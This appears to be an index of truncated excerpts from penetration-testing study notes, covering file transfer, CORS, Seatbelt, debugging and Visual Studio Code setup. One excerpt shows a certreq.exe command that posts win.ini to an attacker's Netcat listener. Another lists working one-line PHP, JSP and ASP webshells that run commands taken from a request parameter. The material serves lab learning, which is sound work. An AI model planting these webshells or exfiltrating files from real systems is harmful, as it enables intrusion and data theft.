Upload win.ini to our Pwnbox This will send the file to our Netcat session, and we can copy-paste its contents. C:\htb> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini Fil...

Same-Origin Policy and CORS There are three key concepts to understand CORS: Origins and the Same-Origin Policy (SOP) Cross-Origin Resource Sharing (CORS) Sending Requests Between Origins ...

SEATBELT Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives. You can download from he...

Base64 Upload/Download In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. ...

PHP WEBSHELL <?php system($_REQUEST["cmd"]); ?> JSP WEBSHELL <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP WEBSHELL <% eval request("cmd") %>

String Example: $app->post('upload-avatar', function (Request $request, Response $response, array $args) use ($container) { Useful for Notepad++ Keeps only the string $app->post('upload-a...

Remote Debugging Remote debugging allows us to debug a process running on a different system as long as we have access to the source code and the debugger port on the remote system. Let’s try...

Installation OPTION #1 The easiest way to install Visual Studio Code for Debian/Ubuntu based distributions is to download and install the .deb package (64-bit), either through the graphical softwa...

Assemblies Modification We can arbitrarily modify assemblies, by using this technique to add debugging statements to a log file or alter an assembly’s attributes in order to better debug our targe...

Debugging One of the best ways to understand an application is to run it through a debugger, which allows us to inspect application memory and call stacks. This information can be invaluable when ...